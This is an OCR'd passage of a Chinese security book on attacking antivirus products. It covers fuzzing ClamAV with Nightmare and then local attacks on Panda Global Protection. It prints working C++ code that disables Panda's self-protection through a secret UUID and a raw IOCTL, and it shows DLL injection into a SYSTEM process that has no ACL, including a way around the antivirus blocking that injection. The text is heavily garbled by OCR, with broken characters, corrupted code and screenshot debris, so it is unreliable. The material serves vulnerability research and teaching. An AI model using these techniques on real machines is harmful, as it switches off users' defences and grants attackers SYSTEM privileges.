owed 

[Wed Apr 22 19:16:55 2015 20324:140432407086912] Launching debugger with 
command /usr/bin/clamscan --quiet /tmp/tmpRAoDQ2.fil 

LibClamAV Warning: cli scanicon: found 6 invalid icon entries of 6 total 
[Wed Apr 22 19:17:57 2015 20324:140432407086912] Launching debugger with 
command /usr/bin/clamscan --quiet /tmp/tmpOOIWnE.fil 

LibClamAV Warning: PE file contains 16389 sections 

(SD 


最 终 ， 我 们 让 fuzzer 跑 起 来 了 ! fuzzer 会 在 调试 界面 下 运行 目标 进程 clamscan， 并 记录 模糊 测 
试 项 目 进行 期 间 目 标 进程 发 生 的 所 有 崩 尝 信息 。 我 们 可 以 在 前 端 Web 应 用 中 ， 查 看 相关 统计 和 结 
果 。 回 到 Web 界 面 ， 点 击 Statistics 链 接 ， 我 们 会 看 到 类 似 图 13-4 的 结 
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Launching fuzzer, 


















































项 目 样本 
| y" It 
60 
40 
20 








ClamAV 


IH 
图 13-4 ”查看 模糊 测试 统计 图 表 
最 终 ， 如 果 选 取 的 模糊 测试 模版 恰当 再 加 上 一 点 小 运气 ， 模 糊 测 试 目标 进程 就 会 月 演 。 如 


果 在 测试 过 程 中 ， 产 生 了 一 个 或 多 个 骨 江 ,我 们 点 击 Results 链 接 ， 就 可 以 看 到 类 似 图 13-5 所 示 
的 窗口 。 





模糊 测试 结 


IOxXE77CD430 SIGABRT|Unknown  f77cd430 POP EBP 2014-11-04 12:28:05 
«(0xF7706430 SIGABRT|Unknown  f7706430 POP EBP 2014-11-04 10:33:54 
«(0xF77A2430 SIGABRT|Unknown  f77a2430 POP EBP 2014-11-04 10:23:40 
«0xF7768430 SIGABRT|Unknown  |f7768430 POP EBP 2014-11-04 10:10:57 
«(0xF7752430 SIGABRT|Unknown  |f7752430 POP EBP 2014-11-04 08:35:16 
«0xF778D430 SIGABRT|Unknown  f778d430 POP EBP 2014-11-04 08:32:43 
«(0xF778B430 SIGABRT|Unknown  |f778b430 POP EBP 2014-11-04 08:13:10 
«OxFGEB9624 SIGSEGV [Exploitable f6eb9624 CALL [EDX--0x8] 2014-11-04 06:31:03 
«|0xF7700430 SIGABRT|Unknown |f7700430 POP EBP 2014-11-04 06:18:30 
«O0xF77CC430 SIGABRT|Unknown  f77cc430 POP EBP 2014-11-04 06:11:58 









































ID | [| (0) [0] (07) o) 四 e) 






































25 crash(es) hidden... Show all crashes. 


图 13-5 查看 模糊 测试 结 


我 们 可 以 在 上 述 界面 处 下 载 会 产生 崩溃 的 样本 , 并 对 比 样本 文件 经 历 的 改动 , 来 创建 可 以 触 
发 相关 缺陷 的 针对 性 样本 ， 同 时 查看 register 值 和 调用 栈 等 。 





13.2 总结 


动态 分 析 包 括 一 系列 提取 程序 运行 时 和 行为 信息 的 技术 。 本 章 主 要 阐释 了 两 种 动态 分 析 技 
术 : 模糊 测试 和 代码 覆盖 测试 。 

模糊 测试 通过 向 待 测 程序 传 和 异常 或 畸形 的 数据 ， 尝 试 让 其 月 演 。 有 简单 的 模糊 测试 工具 ， 
也 有 相对 高 级 复杂 的 ， 它 们 通常 有 以 下 功能 特性 : 
O 模糊 测试 修改 器 ”该 模块 用 于 对 模糊 测试 模版 、 传 人 文件 、 协 议 或 文件 格式 进行 修改 ; 
口 二 进 制 探测 工具 ”这 类 库 文件 或 程序 允许 我 们 探测 应 用 ， 并 记录 相关 指令 、 基 础 区 块 执 
行 以 及 捕获 异常 和 错误 等 ; 
口 缺陷 复 现 和 崩溃 管理 工具 ”这 类 工具 可 以 让 捕获 并 分 类 崩溃 样本 、 生 成 用 于 研究 崩 演 的 
报告 的 过 程 变 得 容易 许多 ; 
O 代码 覆盖 测试 工具 ”这 类 工具 可 以 帮助 我 们 挖掘 可 能 存在 漏洞 的 代码 。 

要 让 fuzzer 有 效 工作 ， 选 择 正确 的 模糊 测试 模版 十 分 重要 。 在 选择 模版 文件 的 时 候 ， 要 考虑 
在 待 测 程序 中 打开 的 可 行 性 。 可 以 通过 在 自己 的 电脑 上 查找 特定 文件 、 使 用 谷歌 检索 (使 用 
filetype 关 键 词 ), 或 者 从 其 他 可 供 下 载 的 反 病 毒 测试 套 组 中 查找 合适 的 模版 文件 。 

代码 覆盖 测试 是 一 种 基于 在 目标 程序 运行 过 程 中 , 探测 被 执行 的 不 同 指令 、 基 础 区 块 或 函数 
的 动态 分 析 技 术 。 代码 覆盖 测试 通常 是 模糊 测试 套 组 的 一 个 子 模块 部 分 。 进 行 代码 覆盖 测试 通常 
是 为 了 能 够 挖掘 出 未 涉及 的 新 代码 路 径 , 以 便 挖掘 出 背后 潜藏 的 相关 漏洞 。 本 章 主要 探讨 了 两 种 
代码 覆盖 测试 技术 : 

口 使 用 符号 化 执行 和 SMT 处 理 器 来 解释 被 执行 或 在 目标 二 进 制 文件 中 发 现 的 代码 ， 获 取代 

码 中 使 用 的 变量 ， 并 将 其 虚拟 化 ， 生 成 SMT 公 式 ， 然 后 让 SMT 处 理 器 来 挖掘 出 能 够 覆盖 
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更 多 特性 的 传人 样本 的 代码 变动 ; 





口 对 模糊 测试 模版 文件 进行 随机 或 半 随 机 的 变动 修改 ， 然 后 使 用 二 进 制 探测 工具 ， 来 检查 
新 的 修改 能 否 挖掘 出 可 以 覆盖 到 新 特性 的 代码 。 


总 地 来 说 ，fozzer 的 工作 方式 如 下 : 
(1) 使 用 模版 文件 对 目标 程序 开展 模糊 测试 ; 
(2) 依据 模版 文件 ， 进 行 相 关 修 改 ， 生 成 新 的 四 








(3) 新 生成 的 模糊 测试 畸变 文件 样本 ， 会 传递 给 运行 在 二 进 


桨 变 文 件 样本 ; 








判 调试 器 下 的 目标 程序 处 理 ; 


(4) 如 果 相 关 样 本 引起 了 目标 程序 于 溃 ， 包 zzer 会 记录 相关 谣 溃 信息 ; 
(5) 在 二 进 制 调试 探测 过 程 中 , 所 发 现 的 能 执行 新 代码 区 块 的 文件 样本 , 会 作为 fazzer 之 后 迭 





代 测 试 的 模糊 测试 模版 ; 


(6) 上 述 步 骤 可 以 迭代 一 次 或 多 次 ， 直 到 完成 预 设 的 循环 次 数 或 挖 气 到 足够 多 的 漏洞 ， 否 则 


整个 过 程 可 以 无 限 循环 。 














本 章 最 后 的 实战 部 分 介绍 了 如 何 安装 、 配 置 和 使 用 Nightmare 模 糊 测试 套 组 。 
了 解 了 上 述 实用 的 知识 后 ， 就 可 以 有 把 握 地 对 反 病 毒 软件 或 其 他 类 似 软件 开展 模糊 测试 了 。 
下 一 章 将 会 探讨 , 在 利用 远程 漏洞 获取 到 目标 机 需 初 始 权 限 的 情况 下 , 如 何在 本 地 挖掘 并 利 

















用 反 病 毒 软件 中 的 漏洞 。 


本 地 攻击 








本 地 攻击 技术 是 一 种 用 于 在 接触 到 本 地 目标 计算 机 后 , 利用 产品 或 其 相关 模块 的 漏洞 进行 攻 
击 的 技术 。 
比如 , 本 地 攻击 技术 可 以 在 成 功 实施 远程 攻击 后 用 来 提升 权限 ,或 在 已 接触 到 目标 机 器 后 单 
独 使 用 。 借 助 这 类 技术 ,攻击 者 能 够 将 用 户 权 限 从 普通 用 户 直接 提升 到 拥有 更 高 权限 的 用 户 〈 比 
如 ，SYSTEM 或 root 用 户 ), 在 最 糟糕 的 情况 下 ,甚至 可 以 获取 到 内 核 层 面 的 权限 。 这 类 技术 通常 
会 利用 以 下 几 种 类 型 的 漏洞 开展 攻击 。 
口 内 存 破坏 ”这 类 漏洞 特 指 运行 在 本 地 具有 高 权限 的 服务 中 的 内 存 破坏 漏洞 。 取 决 于 漏洞 
的 实际 情况 以 及 编译 器 或 操作 系统 提供 的 漏洞 缓 释 技术 ， 利 用 这 类 漏洞 进行 攻击 的 可 行 
性 一 般 较 低 。 
OQ 错误 的 权限 分 配 这 类 漏洞 是 由 于 给 本 地 服务 分 配 了 错误 的 权限 或 访问 控制 列表 (access 
control list, ACL ) 而 导致 的 。 比 如 ,以 SYSTEM 权 限 运 行 、 但 ACL 却 为 null 的 进程 的 漏洞 
就 十 分 容易 被 利用 ， 一 般 来 说 可 靠 性 是 100%。 
口 逻辑 漏洞 “这 类 漏洞 是 最 优雅 却 也 最 难 发 现 的 漏洞 种 类 。 逻 辑 漏 洞 通常 是 一 种 设计 缺陷 ， 
它 允 许 通 过 完全 合法 的 方式 ， 特 别 是 反 病 毒 软 件 本 身 使 用 的 相同 方式 ， 来 获取 具有 较 高 
权限 的 资源 。 利 用 这 类 漏洞 的 难度 取决 于 具体 的 设计 缺陷 情况 ， 但 是 其 可 靠 性 指数 是 
100%。 更 好 的 消息 是 ,这 类 漏洞 因为 需要 对 产品 作出 重大 改动 , 所 以 无 法 很 容易 地 修复 。 
这 类 漏洞 和 产品 的 相关 模块 深度 整合 交织 ， 在 不 产生 其 他 新 漏洞 的 情况 下 ， 修 复 这 类 侵 
辑 漏洞 很 难 。 
接 下 来 的 几 节 将 会 探讨 应 该 如 何 利 用 这 类 本 地 漏洞 开展 攻击 , 同时 展示 一 些 反 病毒 软件 实际 
存在 的 旧 漏 洞 。 


14.4 利用 后 门 和 隐藏 功能 


一 些 产品 包含 特定 的 后 门 或 隐藏 功能 ， 可 以 让 启用 或 禁用 某 些 特定 产品 功能 变 得 容易 许多 
(一 般 技术 支持 会 使 用 这 些 后 门 或 隐藏 的 功能 )。 这 类 后 门 在 产品 的 开发 阶段 十 分 有 用 , 但 无 论 是 
有 意 还 是 无 意 的 , 如 果 在 线 上 正式 发 布 的 产品 中 带 有 这 些 后门 或 隐藏 功能 , 那么 它们 最 终 会 被 攻 
击 者 发 现 并 利用 。 这 类 漏洞 可 能 是 有 意 预 留 给 技术 支持 人 员 使 用 的 , 也 有 可 能 是 不 合理 的 开发 设 
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计 理 念 带 来 的 。 要 记 住 一 点 ， 没 有 什么 能 逃 得 过 逆向 分 析 工 程 师 的 眼睛 ， 而 混 消 技术 无 法 抵挡 意 
志 坚 定 的 黑客 : 如 果 产 品 开放 了 任何 后 门 ， 述 早 会 被 发 现 的 。 
让 我 们 举 一 个 已 经 被 修复 、 影 响 了 Panda Global Protection 反 病毒 软件 2013 及 其 以 下 版 本 的 漏 
illl; Panda Global Protection 是 我 评估 过 的 所 有 反 病 毒 软件 中 最 糟糕 的 一 个 : 不 到 一 天 的 功夫 ,我 
已 经 找到 了 三 个 本 地 漏洞 ,所 以 并 不 打算 继续 分 析 下 去 了 。 我 发 现 的 第 一 个 漏洞 的 成 因 是 不 合理 
的 开发 选择 。 如 图 14-1 所 示 , 为 了 防止 反 病 毒 进程 被 在 同一 个 计算 机 上 运行 的 “AV 终 结 者 ”病毒 
结束 ，Panda 反 病毒 软件 借助 内 核 驱 动 对 某 些 进程 启用 了 相关 防护 。 


EE 


File Options View Help 














Applications Processes | services | Performance | Networking | Users l 


nose tome — — — [ero [username | coo me z 


idaq.exe 3332 joxean 82.384K 





The Interactive Disassembler 
explorer.exe 2476 joxean om 30,992K Windows Explorer 


procexp.exe 3880 joxean n2 10.764 K Sysinternals Process Explorer 
taskhost.exe 2252 joxean om 3,260K Host Process For Windows Tasks 
VBoxTray.exe 2608 joxean 00 2.728K VirtualBox Guest Additions Tray Application 
dum.exe 2424 joxean om 2,432K Desktop Window Manager 
taskmgr.exe 552 joxean o0 2.168K Windows Task Manager 
winlogon.exe 388 o0 1.496 K 
Csrss.exe 352 00 1.060 K 
3200 joxean [uu 136K PavBckPT Aplicación 
SrvLoad.exe 3468 00 128K Panda Antispam Trainer 
x 


e The operation could not be completed, 


— A device attached to the system is not functioning. 





[^^] Show processes from all users | End Process | 


Processes: 45 [cpu usage: 1% [Physical Memory: 21% [ A 


图 14-1 Panda 反 病毒 的 自我 防护 盾 会 防止 任务 管理 器 禁用 Panda 反 病毒 的 进程 


但 是 , 该 内 核 驱 动 可 以 和 任意 进程 自由 通信 。 不幸 的 是 , 存在 IO 控制 代码 (IO Control Code , 
IOCTL ) 可 以 用 于 禁用 该 防护 。 

在 涉及 细节 之 前 ， 先 来 讲 讲 我 是 如 何 发 现 这 个 漏洞 的 。Panda Global Protection 安 装 的 一 个 名 
叫 pavshld.dl! 的 库 文件 引起 了 我 的 注意 。 除 了 PavsHLD_001 和 PaAvsHLD_002 函 数 外 , 该 库 文件 导 
出 了 一 系列 容易 读 懂 的 函数 名 。 当 我 稍微 看 了 一 下 第 一 个 函数 PAvVSHLD_001 后 ， 就 确定 这 背后 
必定 隐藏 着 什么 奥秘 。 该 函数 接受 的 唯一 参数 是 一 个 值 为 ae217538-194a-4178-9a8f- 
2606b94d9f13 的 UUID。 如 果 UUID 正 确 ,， 程 序 会 调用 一 系列 函数 ， 其 中 一 些 函 数 会 对 注册 表 做 
改动 。 注 意 到 如 此 奇怪 的 代码 后 ， 我 打算 编写 一 个 C++ 程序 来 弄 清 楚 ， 使 用 神奇 的 UUID 值 调用 
该 函数 后 会 发 生 什么 : 


/** 

































































Tool to disable the shield (auto-protection) of Panda Global Protection 


Py 
#include <iostream> 





Global Protection 2012 的 电脑 上 运行 了 编写 的 C++ 测试 程序 后 , 我 发 现 可 以 通过 Windows 任 务 管理 
器 轻松 结束 Panda 反 病毒 的 进程 。 我 又 以 普通 用 户 身 份 和 更 低 权 限 的 用 户 身 份 (专门 为 本 次 试验 
ERJ) 来 做 相同 的 操作 ， 结 果 都 是 一 样 的 ，Panda 反 病毒 的 进程 可 以 被 轻松 结束 。 在 运行 我 编 
写 的 这 个 C++ 程序 之 前 ， 我 无 法 结束 任何 Panda 反 病毒 的 进程 ， 但 运行 它 之 后 就 可 以 了 。 这 着 实 
糕 ,。 但 是 , 我 之 前 认为 该 函数 仅 对 注册 表 键 进行 了 改动 的 想法 其 实 是 错 的 , 该 库 文件 事实 上 额 
外 调用 了 另 一 个 库 文 件 : ProcProt.dll。PAVSHLD_001 消 数 会 校 验 是 否 传人 了 秘密 UUID 值 并 包含 
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#include «windows.h» 
dinclude «rpc.h» 
using namespace std; 
typedef BOOL (*disable shield t) (UUID*); 
int main() 
{ 
HMODULE hlib = LoadLibrary ("C:\\Program Files (x86)\\Common Files\\" 
"Panda Security\\Pavshld\\Pavshld.dll"); 
if ( hlib ) 
{ 
cout «« "[+] Loaded pavshld.dll library" «« endl; 
UUID secret key; 
UuidFromString( 
(unsigned char *)"ae217538-194a-4178-9a8f-2606b94d9f13", 
&secret key); 
disable shield t p disable shield; 
p.disable shield - (disable shield t)GetProcAddress (hlib, 
"PAVSHLD 0001"); 
if ( p disable shield !- NULL ) 
{ 
cout << "[+] Resolved function PAVSHLD 0001" << endl; 
if ( p disable shield(&secret key) ) 
cout << "[+] Antivirus disabled!" << endl; 
else 
cout << "[-] Failed to disable antivirus: " << GetLastError () 
<< endl; 
} 
else 
cout << "[-] Cannot resolve function PAVSHLD_0001 :(" << endl; 
) 
else 
t 
cout «« "Cannot load pavshld.dll library, sorry" «« endl; 
} 
return 0; 
} 
上 述 代 码 加 载 库 文 件 PavShld.dll 然 后 调用 了 导出 的 函数 PAVSHLD_001。 在 一 台 交 有 Panda 
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如 下 代码 : 
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.tCext:3DA26272 loc 3DA26272: ; CODE XREF: PAVSHLD_0001+5Bj 
.text:3DA26272 call sub 3DA260A0 
.Cext:3DA26277 call check supported os 
.text:3DA2627C test eax, eax 
.text:3DA2627E jz short loc 3DA26286 
; ProcProt.dll!Func 0056 is meant to disable the av's shield 
.text:3DA26280 call g Func 0056 
此 处 我 选择 调用 的 函数 是 g_Func_0056， 它 存在 于 库 文件 ProcProt.dl 中 ， 通 过 典型 的 


LoadLib 











rary 和 Get ProcAddress 子 数 调 用 实现 动态 解析 ,我 在 IDA 中 快速 浏览 了 一 下 反 汇 编列 


表 ， 并 未 发 现任 何 令 人 振奋 的 东西 ; 但 是 ， 当 按 下 小 键盘 上 的 - 键 ， 切 换 到 Proximity Browser 时 ， 
就 能 看 到 图 14-2 所 示 的 函数 调用 图 ， 其 中 包括 调用 和 被 调用 的 函数 。 





O 
lacs | 
[Func gosse 

















3 
PEI 


Func_0015 


Aa 
PEI 


Func 9975 


















































PE PE 
sub 3ERO5180 sub 3ER05230 









































sub 3ER06230 IfetCurrentPrecessId| MaitForSingleübject| |ontrolSereice | 














Huic 




















check supported os| 














图 1 


4-2 ProcProt!Func. 0056 的 调用 图 表 








Func_0056 函 数 最 起 码 调用 了 两 个 函数 , 其 最 后 调用 了 用 于 与 内 核 设 备 驱动 通信 的 Windows 
API DeviceIoControl。 库 文件 导出 的 函数 Func_0056 调 用 了 也 数 sub_3EA05180， 又 调用 了 











汇编 代码 如 下 的 API: 
.Cext:3EA0519F loc 3EA0519F ; CODE XREF: sub 3EA05180«11j 
.tCext:3EA0519F push 0 ; lpOverlapped 
.text:3EA051A1 lea ecx, [esp-«-8-«BytesReturned] 
.text:3EA051A5 push ecx ; lpBytesReturned 
.text:3EA051A6 push 0 ; nOutBufferSize 
.text:3EA051A8 push 0 ; lpOutBuffer 
.text:3EA051AA push 0 ; nInBufferSize 
.tCext:3EA051AC push 0 ; lpInBuffer 
.text:3EA051AE push 86062018h ; IoControlCode to disable the shield 
.text:3EA051B3 push eax ; hDevice 
; Final DeviceIoControl to instruct the driver to disable the protection 
.text:3EA051B4 call ds:DeviceloControl 











不 管 你 相信 与 否 , 前 面 提 到 的 存在 于 PavShld.dll 中 、 只 能 通过 传人 隐藏 的 UUID 字 符 串 激活 的 





后 门 ， 其 实 根本 不 需要 UUID 也 能 使 用 ! 
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知道 了 内 核 驱 动 暴 露 的 符号 链接 名 称 和 发 送 的 IOCTL 代 码 , 就 有 可 能 禁用 相关 驱动 。 当 我 们 
通过 反 汇 编 库 文件 提取 了 上 述 两 个 信息 后 , 就 可 以 使 用 以 下 代码 禁用 Panda 反 病毒 的 自我 防护 了 : 


#include <windows.h> 


int main(int argc, char **argv) 
{ 

HANDLE hDevice = CreateFileA( 
"ANNA. NNGIObalNMPAVPROTECT", // DOS device name 
0, 
lu, 

0, 
3u, 
0x80u, 0); 

if ( hDevice ) 

{ 

DWORD BytesReturned; 
DeviceloControl( 

hDevice, 

0x86062018, 

0, 0, 0, 0, &BytesReturned, 0); 

} 

return 0; 


) 
该 逻辑 缺陷 可 以 通过 静态 分 析 技 术 很 轻松 地 挖掘 出 来 。 下 一 节 将 会 介绍 如 何在 程序 中 挖掘 更 
简单 的 设计 和 逻辑 缺陷 。 
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尤其 在 Windows 操 作 系统 中 ， 配 置 有 不 正确 或 不 安全 ACL 的 系统 对 象 十 分 常见 。 比 如 ， 一 个 
以 SYSTEM 权 限 运 行 的 高 权限 应 用 使 用 了 一 些 权 限 (ACL ) 配置 不 安全 的 应 用 , 使 一 个 没有 特权 
的 普通 用 户 可 以 修改 权限 或 与 这 些 高 权限 应 用 交互 ， 从 而 提升 权限 。 举 个 例子 ， 有 时 一 个 进程 或 
应 用 线程 以 SYSTEM 身 份 执 行 ， 同时 具有 最 高 可 能 完整 性 级 别 (也 是 SYSTEM ), 但 是 没有 所 有 
者 。 听 起 来 很 不 可 思议 ， 对 吗 ? 带 有 此 类 漏洞 的 产品 数量 说 出 来 ， 你 可 能 会 大 吃 一 惊 : Oracle 
Windows 版 和 IBM DB2 数 据 库 之 前 都 存在 此 漏洞 ， 而 且 在 我 查找 其 安全 漏洞 的 过 程 中 ， 最 起 码 已 
知 一 款 反 病毒 软件 (Panda Global Protection 2012 ) 存在 类 似 漏 洞 。 

当 审 计 一 款 新 软件 的 时 候 , 第 一 步 就 是 安装 该 款 产 品 , 然后 重启 机 器 ， 接 着 通过 复查 产品 安 
装 的 服务 、 相 关 进 程 、 其 安装 的 每 个 特权 进程 的 相关 对 象 的 权限 控制 (访问 控制 列表 )， 来 分 析 
对 应 产品 的 本 地 攻击 面 。 在 对 Panda Global Protection 2012 分 析 的 前 几 分 钟 里 , 我 发 现 了 一 个 同 已 
知 漏洞 相似 的 、 稀 奇 的 漏洞 : 对 象 权限 控制 错误 或 缺失 。 这 类 问题 可 以 通过 类 似 SysInternal Process 
Explorer 的 工具 挖掘 出 来 ， 如 网 14-3 所 示 。 
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1 Process Explorer - Sysinternals: www.sysinternals.com [joxean-win7-x32\joxean] 























































































































































File Options view Process Find Handle Users Help 
Je iere CTS Ej [a ee | | | [l | I 
Process. CPU| Private Bytes] _ Working Set| PID | Description Company Name Integrit 
s Jsvchostere «00 1470K 18.552K — 732 Host Process for Windows Services Microsoft Corporation. System 
47] psksvc.exe. 0.02 1816K 352K 836 Antimalware protection support executable Panda Security, S.L. System 
BE] TPSiv.ere 41780K. 1.180K 880 TPSr Application Panda Security, S.L. System 
T] WebPros.ese 3312K 228K 3208 Intenet resident proxy Panda Security, S.L. System 
[Ce ED K. 13.056K — 944 Host Process for Windows Services Microsoft Corporation. System 
[EE ebprony ene:3208 properties EE 
Image | Performance | Bericemance Graph | Diskand Network | ie aa aeie esan 
5 Security | Microsoft Corporation System 
Threads | TCHfP | Environment | stings | log REDE Microsoft Corporation. System 
Useri — NT AUTHORITY|SYSTEM 68 pma - - 一 一 Microsoft Corporation. System 
E Spr A 76 | [No permissione have been assigned for this object E Earn Sen 
SE Session: D Logon Session: 3e7 00 | waming this is a potential security risk because anyone who Microsoft Corporation System 
Virtualized: No MO | [can access this object can take ownership of it The object's Microsoft Corporation System 
00 | |ewmer should assign permissions as soon as possible. Panda Security. S.L. System 
Grup + B Panda Security. S.L. System 
BUILTIN Administrators 48 Panda Security, S.L. Medium 
Everyone Mandatory 08 Panda Security, S.L. System 
Mandatory LabelNSystem Mandatory Level Integrity 12 Panda Security, S.L. System 
NT AUTHORITY Authenticated Users Mandatory Md TEE E " Panda Security, S.L. System 
36 ED Panda Security, S.L. System 
96 Full Control Ba | Panda Security Intemational System 
回 | ps Read Hu [m] Panda Security S.L. System 
. a0 Write Microsoft Corporation System 
CORS nia "| pee = = Micrasoft Corporation Medium 
eg Privilege 56 Microsoft Corporation System 
ED |seAssignPimarTokenPrivilee Disabled 64 Microsoft Corporation. System 
SeAudiPiivilege Default Enabled 16 For special permissions or advanced settings, © Advanced Microsoft Corporation System 
SeBackupPrivilege Disabled 32 click Advanced. NEM Microsoft Corporation. System 
a SeChangeNotiyPrivieoe Default Enabled 08 A Microsoft Corporation System 
Ed SeCreateGlobalPrivllge Default Enabled 44  Leam about access control and permissions Microsoft Corporation. Medium 
Peces qiie peus Siri 24 Oracle Corporation. Medium 
eCrealePermaneniPivlege Default Enal 
SeCreateSymbolicLinkPriviege Default Enabled 到 x ; Piae Wsysinter... EM 
Permissions 88K 8.356K — 552 Windows Task Manager Microsoft Corporation Medium 
E= 
Type ok Cancel 
Dacia Komne — S —4 
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图 14-3 展 示 了 一 个 进程 名 为 WebProxy.exe, 以 NTAUTHORITY\SYSTEM 用 户 身 份 运行 ， 
最 高 完整 性 级 别 (SYSTEM )。 但是， 实际 进程 的 访问 控制 列表 配置 过 于 松散 ， 其 至 没有 所 
户 ! 权限 控制 对 话 框 中 出 现 了 下 列 信息 〈 粗 体 用 于 强调 ): 


对 象 没有 被 分 配 权 限 控 制 。 
警告 : 此 处 有 潜在 的 安全 风险 ,因为 任何 可 以 访问 本 对 象 的 人 都 可 以 获取 
其 所 有 权 。 对 象 的 所 有 者 必须 尽快 给 对 象 分 配 权 限 控 制 。 


Process Explorer 很 清楚 地 显示 此 处 存在 安全 缺陷 ， 这 是 因为 任何 可 以 接触 该 对 象 的 人 ， 也 就 
是 在 本 地 机 器 上 的 、 拥 有 任意 权限 的 用 户 ， 都 可 以 获取 该 进程 的 所 有 权 。 这 就 意味 着 ， 像 Google 
Chrome 或 最 新 版 本 Internet Explorer 的 运行 在 沙 盒 中 的 tab 页 面 的 进程 ， 都 可 以 获取 整个 以 
SYSTEM 权 限 运 行 的 进程 的 所 有 权 。 这 就 意味 着 ， ic E acd 于 快速 便捷 地 突破 沙 盒 ， 
提升 权限 至 最 高 权限 之 一 : SYSTEM。 要 让 这 种 预 设 场景 成 功 复 现 ,攻击 者 需要 找 出 对 应 浏览 器 
中 的 漏洞 并 进行 利用 ， ei cn oig ceu a A 一 步 。 当 然 ， 如 果 攻 击 者 没有 相 
关 浏 览 器 的 漏洞 ， 这 种 情况 也 不 能 成 立 。 不 过 ， 挖 掘 浏 览 器 的 漏洞 并 不 是 什么 复杂 的 工作 。 

这 个 漏洞 的 严重 性 不 言 而 喻 。 不 幸 的 是 , i S e. 在 任何 情况 下 ， 
如 果 产 品 中 存在 此 类 漏洞 , 对 于 黑客 们 来 说 都 是 十 分 幸运 的 事情 ,因为 他 们 可 以 利用 漏洞 进行 攻 
击 了 。 最 简单 的 利用 方式 就 是 编写 程序 ， 实现 权限 提升 : 我 们 只 要 获取 该 进程 的 所 有 权 ， 或 者 向 
该 进程 运行 上 下 文 注入 一 个 线程 。 事实 上 , 我 们 可 以 对 一 个 孤立 进程 做 任何 事情 。 下 面 这 个 例子 
使 用 了 一 个 名 叫 RemoteDLL 的 工具 注入 了 一 个 DLL， 该 工具 可 以 在 如 下 地 址 下 载 : 








sod 


EE: 
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http://securityxploded.com/remotedll.php 。 
下 载 完 成 后 , 将 其 解压 到 一 个 目录 下 , 并 执行 可 执行 程序 子 目 录 下 名 为 RemoteD1132.exe 的 程 
序 。 接 着 会 出 现 如 图 14-4 这 样 的 一 个 对 话 框 : 


Iii RemoteDLL - www.Securityxploded.com 





m RemoteDUuLu . 


Simple Tool to Inject or Remove DLL from 





Operation: 


Injection Method: 











图 14-4 RemoteDLL 工 具 的 图 形 界面 


在 使 用 该 工具 的 过 程 中 ，Operation 和 Inject Method 选 项 保持 默认 不 变 ， 然 后 将 Target Process 
设置 为 存在 漏洞 的 WebProxy.exe 进 程 。 接 着 ， 创 建 一 个 简单 的 DLL 动态 链接 库 文件 ， 然 后 在 
RemoteDLL 工 具 中 载 人 刚刚 创建 的 DLL 文件 。 可 以 参考 以 下 使 用 C 语 言 编写 的 简单 库 文件 : 


#include «Windows.h» 
#include «stdlib.h» 


BOOL APIENTRY DllMain( HMODULE hModule, 
DWORD ul reason for call, 
LPVOID lpReserved 


switch (ul, reason, for, call) 

{ 

case DLL PROCESS ATTACH: 
// Real code would go here 
break; 

case DLL THREAD ATTACH: 

case DLL THREAD DETACH: 

case DLL PROCESS DETACH: 
break; 








} 
return TRUE; 
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上 述 动态 链接 库 文件 实际 上 并 没有 执行 什么 特别 的 操作 。( 在 DLL 库 文件 被 加 载 ， 
DLL_PROCESS_ATTACH 事 件 执 行 的 时 候 , 我 们 事实 上 可 以 做 任何 事情 。 ) 使 用 你 最 中 意 的 翻译 器 ， 
比如 Microsoft Visual Studio， 将 上 述 代 码 编译 成 DLL 文 件 ， 然 后 在 RemoteDLL 工 具 中 DLL Name 
标签 后 面 选择 刚刚 编译 输出 的 DLL 路 径 。 然 后 ， 我 们 只 需要 轻 点 Inject DLL 按 钮 即 可 。 但 是 出 人 
意料 的 是 ， 该 攻击 被 侦 测 并 被 Panda 反 病毒 软件 阻 断 了 。 同 时 出 现 了 如 图 14-5 所 示 带 有 “和 危险 操 
作 已 被 阻止 ”的 消息 框 ( 图 中 是 西班牙 语 信息 )。 





E RemoteDLL - www.SecurityXploded.com 





















RemoteDUU 


Simple Tool to Inject or Remove DLL from "AE 


S 














= how Help About 


Operation: (* Inject DLL C Free DLL 


Injection Method; CreateRemoteThread z] E 
Target Process: [1244] WebProxy.exe || E 


DLL Name: Ciltoolsldls|open, cmdiDebuglopen. cmd.dli [| d 
E 

















Injection Method = CreateRemoteThread 


Step 1 => Opening target process [1244 - WebProxy,exe] for DLL Injection 
Succ 





Step 2 => Writing the DLL Path Name [C:\ools\dlls\open_cmd\Debughopen_cmd, dll] into target process 


Step 4 => Injecting the DLL into target process using the method 'CreateRemoteThread' 
Method Cre: Thread faile 5 










ess 


Step 3 => [Defeat ASLR] Calculating the LoadLibrary function address on target process 
Successfully got the address of Kernel32.dll on target process 
Address of Kernel32.dll [Target Process] = 0x77DE0000 
Address of LoadLibrary [Target Process] = 0x77E2DD15 


Failed, Error = 0x0000000! 


图 14-$ Panda 反 病毒 阻 断 了 注入 DLL 文件 的 操 4 








反 病 毒 软件 的 日 志文 件 中 显示 , RemoteDLL 工 具 调 用 createRemoteThread API 来 注入 DLL 
文件 的 操作 被 侦 测 到 了 。 我 们 下 面 有 几 种 办 法 可 以 继续 实施 攻击 : 


(1) 禁用 自我 保护 ， 此 次 注入 被 捕获 的 原因 可 能 是 Panda 反 病毒 开启 了 自我 保护 ; 





(2) 使 用 其 他 方式 。 

如 果 不 知道 禁用 Panda 反 病毒 自我 保护 的 其 他 办 法 ， 我 们 还 可 以 使 用 其 他 方式 注入 DLL 文 件 
"ij? 幸运 的 是 , RemoteDLL 提 供 了 使 用 未 在 文档 中 说 明 的 原生 NtcreateThread API 来 注入 DLL 
的 另 一 种 方式 。 它 直接 调用 了 NtcreateThread 困 数 (其 在 createRemoteThread 内 部 被 调用 ), 
而 不 是 使 用 createRemoteThread API。 在 Injection Method 下 拉 列 表 中 ， 选 择 NTCreateThread , 
然后 再 次 点 击 Inject DLL 按钮 。 在 点 击 按钮 后 ， 软 件 似乎 卡 住 不 动 了 ， 但 是 如 果 我 们 看 一 下 


SysInternal Process Explorer， 会 发 现 如 图 14-6 所 示 的 结果 。 
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p —— —— T m Private B} 5 Wo eL — b: Æ RemoteDLL - www.SecurityXploded.com {Not Responding} 
ERIS 023 44K 652K 4 一 一 一 
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1208K 30K 352 . E 
E E] csrss exe 0.06 1232K 4568K 388 Simple Tool to Inject or Remove DLL from Process 
conhost ere 516K 2140K eeo Console Wind " 
E) EJ winnt. exe 908K 3308K 42 mut — = Sho Help. 
4404K 7108K 500 
EI^! svchastese 2584K 6324K 620 Host Process Operation: = MiniectDl f Free DLL 
undl2.exe 2824K 6.536K 2440 Windows host 
T) VBoiGervice.exe 3428K 6952K Injection Method: NrCreateThread [undocumented] - 
